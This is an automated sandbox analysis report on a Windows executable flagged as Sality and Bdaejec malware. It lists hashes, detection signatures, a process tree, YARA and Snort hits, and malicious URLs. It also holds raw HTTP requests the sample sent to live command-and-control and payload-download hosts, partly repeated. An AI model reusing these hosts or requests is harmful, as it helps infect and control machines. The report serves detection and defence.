Windows Analysis Report
1.0.0.2.exe

Overview

General Information

Sample name: 1.0.0.2.exe
Analysis ID: 1467981
MD5: ad809738e208d99a28009023546bc695
SHA1: 3326e4971b5b23122dac680dfb9eb41df0692267
SHA256: 775939b8bf22ee4999cebd8d9e1525ca9417464b5fe6ed1778f0a7b43d07d6ef
Tags: exe, sality

Detection

Bdaejec, Sality
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Bdaejec
Yara detected Sality
AI detected suspicious sample
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to inject threads in other processes
Creates autorun.inf (USB autostart)
Deletes keys which are related to windows safe boot (disables safe mode boot)
Disables UAC (registry)
Disables user account control notifications
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
May modify the system service descriptor table (often done to hook functions)
Modifies the windows firewall
Modifies the windows firewall notifications settings
PE file contains section with special chars
PE file has a writeable .text section
Uses known network protocols on non-standard ports
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • 1.0.0.2.exe (PID: 5352 cmdline: "C:\Users\user\Desktop\1.0.0.2.exe" MD5: AD809738E208D99A28009023546BC695)
    • rksowY.exe (PID: 5344 cmdline: C:\Users\user\AppData\Local\Temp\rksowY.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)
      • WerFault.exe (PID: 7356 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1328 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • fontdrvhost.exe (PID: 780 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • fontdrvhost.exe (PID: 788 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • dwm.exe (PID: 996 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
  • cleanup
Name: Sality

Description: F-Secure states that the Sality virus family has been circulating in the wild as early as 2003. Over the years, the malware has been developed and improved with the addition of new features, such as rootkit or backdoor functionality, and so on, keeping it an active and relevant threat despite the relative age of the malware. Modern Sality variants also have the ability to communicate over a peer-to-peer (P2P) network, allowing an attacker to control a botnet of Sality-infected machines. The combined resources of the Sality botnet may also be used by its controller(s) to perform other malicious actions, such as attacking routers.

Infection: Sality viruses typically infect executable files on local, shared and removable drives. In earlier variants, the Sality virus simply added its own malicious code to the end of the infected (or host) file, a technique known as prepending. The viral code that Sality inserts is polymorphic, a form of complex code that is intended to make analysis more difficult. Earlier Sality variants were regarded as technically sophisticated in that they use an Entry Point Obscuration (EPO) technique to hide their presence on the system. This technique means that the virus inserts a command somewhere in the middle of an infected file's code, so that when the system is reading the file to execute it and comes to the command, it forces the system to 'jump' to the malware's code and execute that instead. This technique was used to make discovery and disinfection of the malicious code harder.

Payload: Once installed on the computer system, Sality viruses usually also execute a malicious payload. The specific actions performed depend on the specific variant in question, but generally Sality viruses will attempt to terminate processes, particularly those related to security programs. The virus may also attempt to open connections to remote sites, download and run additional malicious files, and steal data from the infected machine.

Attribution: Salty Spider

Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.sality
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\winmefmb.exe | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen
  • 0x14:$b1: yrf<[LordPE]
  • 0x210:$b2: Hello world!
C:\iuepn.exe | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen
  • 0x14:$b1: yrf<[LordPE]
  • 0x210:$b2: Hello world!
Source | Rule | Description | Author | Strings
00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Sality | Yara detected Sality | Joe Security
Process Memory Space: 1.0.0.2.exe PID: 5352 | JoeSecurity_Sality | Yara detected Sality | Joe Security
Process Memory Space: rksowY.exe PID: 5344 | JoeSecurity_Bdaejec | Yara detected Bdaejec | Joe Security
Source | Rule | Description | Author | Strings
0.2.1.0.0.2.exe.111ff18.7.raw.unpack | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen
  • 0x14:$b1: yrf<[LordPE]
  • 0x210:$b2: Hello world!
0.2.1.0.0.2.exe.2be2300.11.raw.unpack | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen
  • 0x1b7c:$s1: Simple Poly user v
  • 0x14:$b1: yrf<[LordPE]
  • 0x210:$b2: Hello world!
0.2.1.0.0.2.exe.2be25f4.12.raw.unpack | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen
  • 0x1888:$s1: Simple Poly user v
0.2.1.0.0.2.exe.2b60000.10.unpack | JoeSecurity_Sality | Yara detected Sality | Joe Security
0.2.1.0.0.2.exe.2b60000.10.unpack | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen
  • 0x83e7c:$s1: Simple Poly user v
  • 0x82314:$b1: yrf<[LordPE]
  • 0x82510:$b2: Hello world!

System Summary

Source: Registry Key set | Author: frack113 | Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\1.0.0.2.exe, ProcessId: 5352, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
07/05/24-08:00:04.879865 | 2804830 | 49715 | 80 | TCP | A Network Trojan was detected
07/05/24-08:00:03.856779 | 2804830 | 49712 | 80 | TCP | A Network Trojan was detected
07/05/24-08:00:06.311326 | 2804830 | 49716 | 80 | TCP | A Network Trojan was detected
07/05/24-08:00:09.880391 | 2804830 | 49722 | 80 | TCP | A Network Trojan was detected
07/05/24-08:00:06.909560 | 2804830 | 49718 | 80 | TCP | A Network Trojan was detected
07/05/24-08:00:07.763277 | 2804830 | 49719 | 80 | TCP | A Network Trojan was detected
07/05/24-08:00:03.315545 | 2838522 | 63363 | 53 | UDP | A Network Trojan was detected
07/05/24-08:00:06.805804 | 2037771 | 80 | 49716 | TCP | A Network Trojan was detected
07/05/24-08:00:09.129606 | 2804830 | 49720 | 80 | TCP | A Network Trojan was detected
07/05/24-08:00:03.544015 | 2807908 | 49710 | 799 | TCP | A Network Trojan was detected
07/05/24-08:00:10.394245 | 2804830 | 49723 | 80 | TCP | A Network Trojan was detected
07/05/24-08:00:10.955809 | 2804830 | 49725 | 80 | TCP | A Network Trojan was detected
07/05/24-08:00:11.733848 | 2804830 | 49726 | 80 | TCP | A Network Trojan was detected

AV Detection

Source: 1.0.0.2.exe | Avira: detected
Source: http://amsamex.com/xs.jpg | Avira URL Cloud: Label: malware
Source: http://www.careerdesk.org/images/xs.jpg?5059c3=10531718 | Avira URL Cloud: Label: malware
Source: http://www.careerdesk.org/images/xs.jpg | Avira URL Cloud: Label: malware
Source: http://a3inforservice.com.br/images/logof.gif | Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rars | Avira URL Cloud: Label: phishing
Source: http://www.klkjwre9fqwieluoi.info/ | Avira URL Cloud: Label: malware
Source: http://arthur.niria.biz/xs.jpg | Avira URL Cloud: Label: malware
Source: http://arthur.niria.biz/xs.jpg?51fbda=483560101 | Avira URL Cloud: Label: malware
Source: http://amsamex.com/xs.jpg?ce2fff=94588921 | Avira URL Cloud: Label: malware
Source: http://accnet.ca/xs.jpg | Avira URL Cloud: Label: malware
Source: http://ahmediye.net/xs.jpg | Avira URL Cloud: Label: malware
Source: http://kukutrustnet777888.info/DisableTaskMgrSoftware | Avira URL Cloud: Label: phishing
Source: http://althawry.org/images/xs.jpg | Avira URL Cloud: Label: malware
Source: http://accnet.ca/xs.jpghttp://a3inforservice.com.br/images/logof.gif | Avira URL Cloud: Label: malware
Source: http://apple-pie.in/images/xs.jpg | Avira URL Cloud: Label: phishing
Source: http://arthur.niria.biz/xs.jpg?51fbda=48356010a | Avira URL Cloud: Label: malware
Source: http://amsamex.com/xs.jpg?ce2fff=945889216 | Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar | Avira URL Cloud: Label: malware
Source: http://arthur.niria.biz/xs.jpg?c12b4b=126595310T | Avira URL Cloud: Label: malware
Source: http://kukutrustnet987.info/home.gif | Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar9 | Avira URL Cloud: Label: malware
Source: http://ampyazilim.com.tr/images/xs2.jpg | Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar6 | Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar4 | Avira URL Cloud: Label: malware
Source: http://173.193.19.14/logo.gif | Avira URL Cloud: Label: malware
Source: http://kukutrustnet888.info/home.gif | Avira URL Cloud: Label: malware
Source: http://arthur.niria.biz/xs.jpg?c12b4b=126595310C | Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarL | Avira URL Cloud: Label: malware
Source: http://kukutrustnet777.info/home.gif | Avira URL Cloud: Label: malware
Source: http://arthur.niria.biz/xs.jpg?c12b4b=126595310 | Avira URL Cloud: Label: malware
Source: http://apple-pie.in/images/xs.jpg?ce2fff=121614327 | Avira URL Cloud: Label: phishing
Source: http://apple-pie.in/images/xs.jpg?554c8c=39131092 | Avira URL Cloud: Label: phishing
Source: http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif | Avira URL Cloud: Label: malware
Source: http://amsamex.com/xs.jpg?549590=27716560 | Avira URL Cloud: Label: malware
Source: http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers | Avira URL Cloud: Label: malware
Source: http://arthur.niria.biz/xs.jpg?51fbda=48356010 | Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net/ | Avira URL Cloud: Label: malware
Source: http://g2.arrowhitech.com/xs.jpg | Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarp | Avira URL Cloud: Label: malware
Source: http://kukutrustnet777888.info/ | Avira URL Cloud: Label: phishing
Source: http://89.119.67.154/testo5/ | Avira URL Cloud: Label: malware
Source: http://www.careerdesk.org/images/xs.jpg?ad5654=34079484 | Avira URL Cloud: Label: malware
Source: C:\Program Files\7-Zip\Uninstall.exe | Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\iuepn.exe | Avira: detection malicious, Label: W32/Sality.AT
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Users\user\AppData\Local\Temp\winmefmb.exe | Avira: detection malicious, Label: W32/Sality.AT
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Avira: detection malicious, Label: W32/Jadtre.B
Source: www.careerdesk.org | Virustotal: Detection: 11%
Source: ddos.dnsnb8.net | Virustotal: Detection: 11%
Source: apple-pie.in | Virustotal: Detection: 13%
Source: arthur.niria.biz | Virustotal: Detection: 10%
Source: ahmediye.net | Virustotal: Detection: 9%
Source: amsamex.com | Virustotal: Detection: 8%
Source: althawry.org | Virustotal: Detection: 11%
Source: http://www.careerdesk.org/images/xs.jpg | Virustotal: Detection: 9%
Source: http://amsamex.com/xs.jpg | Virustotal: Detection: 9%
Source: http://www.klkjwre9fqwieluoi.info/ | Virustotal: Detection: 10%
Source: http://arthur.niria.biz/xs.jpg | Virustotal: Detection: 10%
Source: http://ddos.dnsnb8.net:799/cj//k1.rars | Virustotal: Detection: 11%
Source: http://ahmediye.net/xs.jpg | Virustotal: Detection: 10%
Source: http://kukutrustnet777888.info/DisableTaskMgrSoftware | Virustotal: Detection: 14%
Source: http://accnet.ca/xs.jpg | Virustotal: Detection: 8%
Source: http://althawry.org/images/xs.jpghttp://www.careerdesk.org/images/xs.jpghttp://arthur.niria.biz/xs.j | Virustotal: Detection: 6%
Source: http://althawry.org/images/xs.jpg | Virustotal: Detection: 9%
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | ReversingLabs: Detection: 100%
Source: C:\Users\user\Desktop\VF.dll | ReversingLabs: Detection: 26%
Source: 1.0.0.2.exe | Virustotal: Detection: 86%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Program Files\7-Zip\Uninstall.exe | Joe Sandbox ML: detected
Source: C:\iuepn.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\winmefmb.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Joe Sandbox ML: detected
Source: 1.0.0.2.exe | Joe Sandbox ML: detected
Source: 1.0.0.2.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb | source: SciTE.exe.2.dr

Spreading

Source: Yara match | File source: 0.2.1.0.0.2.exe.2b60000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1.0.0.2.exe PID: 5352, type: MEMORYSTR
Source: C:\Users\user\Desktop\1.0.0.2.exe | File created: C:\autorun.inf
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: 1.0.0.2.exe, 00000000.00000003.2255038602.000000000760A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\autorun.inf_
Source: 1.0.0.2.exe, 00000000.00000002.2273488135.000000000760A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\autorun.inf_
Source: 1.0.0.2.exe, 00000000.00000003.2255260627.0000000001165000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: autorun.infH
Source: 1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.inf
Source: 1.0.0.2.exe, 00000000.00000002.2266190166.000000000117B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: autorun.infH
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: [AutoRun]
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: autorun.inf
Source: 1.0.0.2.exe, 00000000.00000003.2255401629.000000000117A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: autorun.infH
Source: 1.0.0.2.exe, 00000000.00000002.2272180867.000000000522B000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: [autorun]
Source: 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.inf
Source: autorun.inf.0.dr | Binary or memory string: [AutoRun]
Source: C:\Users\user\Desktop\1.0.0.2.exe | Code function: 0_2_02B6BADD Sleep,FindFirstFileA,FindNextFileA,Sleep | 0_2_02B6BADD
Source: C:\Users\user\Desktop\1.0.0.2.exe | Code function: 0_2_02B657A0 FindFirstFileA,FindNextFileA,Sleep | 0_2_02B657A0
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Code function: 2_2_005B29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose | 2_2_005B29E2
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Code function: 2_2_005B2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread | 2_2_005B2B8C
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Networking

Source: Traffic | Snort IDS: 2838522 ETPRO TROJAN Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup 192.168.2.6:63363 -> 1.1.1.1:53
Source: Traffic | Snort IDS: 2807908 ETPRO TROJAN Backdoor.Win32/Bdaejec.A Checkin 192.168.2.6:49710 -> 44.221.84.105:799
Source: Traffic | Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49712 -> 54.244.188.177:80
Source: Traffic | Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49715 -> 44.221.84.105:80
Source: Traffic | Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49716 -> 44.221.84.105:80
Source: Traffic | Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 44.221.84.105:80 -> 192.168.2.6:49716
Source: Traffic | Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49718 -> 78.46.2.155:80
Source: Traffic | Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49719 -> 37.230.104.89:80
Source: Traffic | Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49720 -> 54.244.188.177:80
Source: Traffic | Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49722 -> 44.221.84.105:80
Source: Traffic | Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49723 -> 44.221.84.105:80
Source: Traffic | Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49725 -> 78.46.2.155:80
Source: Traffic | Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49726 -> 37.230.104.89:80
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 799
Source: global traffic | TCP traffic: 192.168.2.6:49710 -> 44.221.84.105:799
Source: global traffic | UDP traffic: 192.168.2.6:52747 -> 85.17.167.196:9832
Source: Joe Sandbox View | IP Address: 44.221.84.105
Source: Joe Sandbox View | IP Address: 54.244.188.177
Source: Joe Sandbox View | ASN Name: AMAZON-AESUS
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: AEROTEK-ASTR
Source: global traffic | HTTP traffic detected:
    GET /cj//k1.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /images/xs.jpg?5059c3=10531718 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: www.careerdesk.org
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /xs.jpg?51fbda=48356010 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: arthur.niria.biz
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /images/xs.jpg?554c8c=39131092 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: apple-pie.in
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /xs.jpg?5827cf=5777359 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: ahmediye.net
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /images/xs2.jpg?6cbf0c=21380388 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: ampyazilim.com.tr
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /images/xs2.jpg?1 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: ampyazilim.com.tr
    Cache-Control: no-cache
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /images/xs.jpg?ad5654=34079484 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: www.careerdesk.org
    Cache-Control: no-cache
    Cookie: snkz=8.46.123.33; btst=23c464339208da2a95574fbd506ebd72|8.46.123.33|1720159204|1720159204|0|1|0
Source: global traffic | HTTP traffic detected:
    GET /xs.jpg?c12b4b=126595310 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: arthur.niria.biz
    Cache-Control: no-cache
    Cookie: snkz=8.46.123.33; btst=f61c3ab837e78a3dbee4d750570963c6|8.46.123.33|1720159205|1720159205|0|1|0
Source: global traffic | HTTP traffic detected:
    GET /images/xs.jpg?ce2fff=121614327 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: apple-pie.in
    Cache-Control: no-cache
    Cookie: btst=a1590c081175a697dce15a514e641dbf|8.46.123.33|1720159206|1720159206|0|1|0; snkz=8.46.123.33
Source: global traffic | HTTP traffic detected:
    GET /xs.jpg?e14213=73812575 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: ahmediye.net
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /images/xs2.jpg?f4c967=160423430 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: ampyazilim.com.tr
    Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 85.17.167.196
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\1.0.0.2.exe | Code function: 0_2_02B6B888 InternetOpenA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,InternetCloseHandle,InternetCloseHandle | 0_2_02B6B888
Source: global traffic | HTTP traffic detected:
    GET /cj//k1.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /images/xs.jpg?5059c3=10531718 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: www.careerdesk.org
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /xs.jpg?51fbda=48356010 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: arthur.niria.biz
    Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /images/xs.jpg?554c8c=39131092 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /xs.jpg?5827cf=5777359 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?6cbf0c=21380388 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /images/xs.jpg?ad5654=34079484 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=23c464339208da2a95574fbd506ebd72|8.46.123.33|1720159204|1720159204|0|1|0
          Source: global trafficHTTP traffic detected: GET /xs.jpg?c12b4b=126595310 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=f61c3ab837e78a3dbee4d750570963c6|8.46.123.33|1720159205|1720159205|0|1|0
